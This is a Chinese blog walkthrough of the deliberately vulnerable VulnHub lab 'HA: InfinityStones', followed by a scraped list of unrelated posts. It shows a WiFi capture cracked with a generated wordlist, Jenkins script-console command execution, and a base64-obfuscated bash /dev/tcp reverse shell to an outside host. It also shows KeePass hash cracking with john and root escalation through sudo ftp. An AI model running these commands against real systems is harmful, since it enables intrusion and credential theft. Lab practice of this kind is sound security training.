VulnHub靶场学习_HA: InfinityStones
HA-InfinityStones
Vulnhub靶场
下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/
背景:
灭霸认为,如果他杀死了宇宙中所有生命的一半,将恢复平衡。为此,他需要所有六块无限宝石来驱动无限手套,这反过来又使他能够弯曲时间,空间,能量以及物理和现实定律。但是这次复仇者联盟比灭霸领先一步。复仇者联盟在这个CTF中隐藏了所有无限宝石。帮助灭霸获得所有无限宝石并恢复宇宙的平衡。
该机器包含6种带有6种不同标志的无限宝石来测试您的技能,找出它们。
Space Stone空间宝石
Mind Stone心灵宝石
Reality Stone现实宝石
Time Stone时间宝石
Power Stone力量宝石
Soul Stone灵魂宝石
首页,六颗宝石不断切换:

对端口进行探测:

对22端口的SSH进行初步爆破,正常是不会成功的,如果常见用户名及弱口令的话,也是一个突破口。

8080端口:jenkins

443端口:

先对网站进行目录扫描,

对该url进行访问:
http://192.168.136.176/images/

发现是首页中存在的图片,应该不存在宝石,往下走先。



下载,利用编辑器打开。

获取到了空间宝石SPACESTONE:{74E57403424607145B9B77809DEB49D0}
访问该链接:http://192.168.136.176/wifi

.cap是存储WiFi密码的数据包(以前对WiFi进行爆破时接触到过)
Pwd.txt规定了密码了类型,生成字典进行爆破。

利用pydictor生成相关字典。
python3 pydictor.py --conf "[A-Z]{1,1}<none>[0-9]{2,2}<none>[a-z]{2,2}<none>2012" --head gam

生成了21M的字典,枚举。

正常都是使用Aircrack-ng 套件来破解(以前做WiFi实验使用过)

这次使用下WIFIPR这款软件进行破解,试下性能。(搞了个21M的字典,来个A00的密码,裂开了)

获取到密码,gamA00fe2012,WiFi的密码在哪输入呢,接在后面输入试试。

再试下根目录,成功。

获取到了现实宝石,REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
接着对主站进行测试,点开是答题的页面,二进制,刚好8道题。

没办法,看电影就看炫酷了,百度一手。

答案为01101001
还尝试了GET输入,不正确:
http://192.168.136.176/aether.php?quiz=01101001
http://192.168.136.176/aether.php?id=01101001
最终还是放在目录下成功获取信息。

打开文本。

不是摩斯密码,是一种加密方式,Brainfuck解释器
https://www.splitbrain.org/services/ook
解密为 admin:avengers
密码应该是给Jenkins用的。
http://192.168.136.176:8080/ 登录成功

该服务存在命令执行,http://192.168.136.176:8080/script
执行whoami,代码为:println "whoami".execute().text

反弹shell
bash -i >& /dev/tcp/192.168.136.1/3418 0>&1经过base64加密得:
println "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNi4xLzM0MTggMD4mMQ==}|{base64,-d}|{bash,-i}".execute().text

在里面翻了~、/opt、/tmp都没有发现txt的flag。
那先尝试提权吧,查询suid权限。
find / -user root -perm -4000 -print 2>/dev/null

查看下:/opt/script,发现了

获取到了时间宝石TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}
再回去/opt路径下看另一个文件有没有玄机,前面就只是简单的cat看了下。

复制到页面将其下载

KDBX是什么

下载KeePass来打开该文件。

利用JtR(John the Ripper)工具将将不同的文件类型转换为JTR兼容的攻击文件

利用/usr/sbin/keepass2john将morag.kdbx转换为hash
/usr/sbin/keepass2john morag.kdbx >gogogo.hash

再利用john对gogogo.hash进行撞库
John gogogo.hash


进入文件

获取到了力量宝石POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}
同时发现

对https://keepass.info/help/kb/testform.html进行访问登录,设置的虚假信息。

存储的另一个点。

将bW9yYWc6eW9uZHU= 解密得(base64)
morag:yondu
前面在翻/home时有发现morag的文件夹,尝试SSH连接。

成功登录,前面获取的shell也能访问该文件夹,但权限不同,利用该账号尝试提权。
查看suid权限文件find / -user root -perm -4000 -print 2>/dev/null
和前面的文件差不多,看看sudo -l怎么样,jenkins账号没有。

能够以root权限运行ftp,利用ftp提权。(这里的![linux系统命令]表示的是在ftp中执行系统命令,返回ftp环境中)

cat /root/final.txt

获取到root下的flag。

获取到了灵魂宝石,SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
提权的都找到了,还要一个呢,查看了下/var/www/html下的文件,还有一个页面没看见过。

访问http://192.168.136.176/tesseract.html,宇宙魔方页面???

最后看了下提示,原来在SSL的证书里。

同时,nmap能够显示证书验证者:

获取到了心灵宝石,MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
集齐六颗无限宝石,打个响指。---end
VulnHub靶场学习_HA: InfinityStones的更多相关文章
- VulnHub靶场学习_HA: ARMOUR
HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...
- VulnHub靶场学习_HA: Avengers Arsenal
HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- VulnHub靶场学习_HA: Pandavas
HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...
- VulnHub靶场学习_HA: Natraj
HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...
- VulnHub靶场学习_HA: Chakravyuh
HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...
- VulnHub靶场学习_HA:Forensics
HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- Vulnhub靶场——DC-1
记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...
随机推荐
- axios Api介绍
1.Performing a GET request axios.get('/user?ID=12345') .then(function (response) { // handle success ...
- python3爬虫爬取金庸小说所有角色
# -*- coding:utf-8 -*- import requests from bs4 import BeautifulSoup url = 'http://www.jinyongwang.c ...
- 洛谷1265prim算法求最小生成树
题目链接:https://www.luogu.com.cn/problem/P1265 最小生成树的prim算法跟dijkstra算法非常像,就是将点分成两个集合,一个是已经在生成树中的点的集合,一个 ...
- POJ1703 Find them Catch them 关于分集合操作的正确性证明 种类并查集
题目链接:http://poj.org/problem?id=1703 这道题和食物链那道题有异曲同工之处,都是要处理不同集合之间的关系,而并查集的功能是维护相同集合之间的关系.这道题中有两个不同的集 ...
- hdu1455 拼木棍(经典dfs)
给定木棍序列,求解能将木棍拼成相同长度的数根长木棍的情况下长木棍长度的最小值. /*hdu1455dfs */ #include<bits/stdc++.h> using namespac ...
- AI的博弈论,一份插图教程
介绍 我想先问一个简单的问题--你能认出下图中的两个人吗? 我肯定你说对了.对于我们这些早期数学发烧友来说,电影<美丽心灵>(A Beautiful Mind)已经深深地印在了我们的记忆中 ...
- Golang校招简历项目-简单的分布式缓存
前言 前段时间,校招投了golang岗位,但是没什么好的项目往简历上写,于是参考了许多网上资料,做了一个简单的分布式缓存项目. 现在闲下来了,打算整理下. github项目地址:https://git ...
- +load 和 +initialize
APP 启动到执行 main 函数之前,程序就执行了很多代码. 执行顺序: 将程序依赖的动态链接库加载到内存 加载可执行文件中的所有符号,代码 runtime 解析被编译的符号代码 遍历所有的 cla ...
- Nginx是什么东东?
Nginx的产生 没有听过Nginx?那么一定听过它的"同行"Apache吧!Nginx同Apache一样都是一种WEB服务器.基于REST架构风格,以统一资源描述符(Unifor ...
- 大部分程序员还不知道的 Servelt3 异步请求,原来这么简单?
前言 博文地址:https://sourl.cn/URptix 当一个 HTTP 请求到达 Tomcat,Tomcat 将会从线程池中取出线程,然后按照如下流程处理请求: 将请求信息解析为 HttpS ...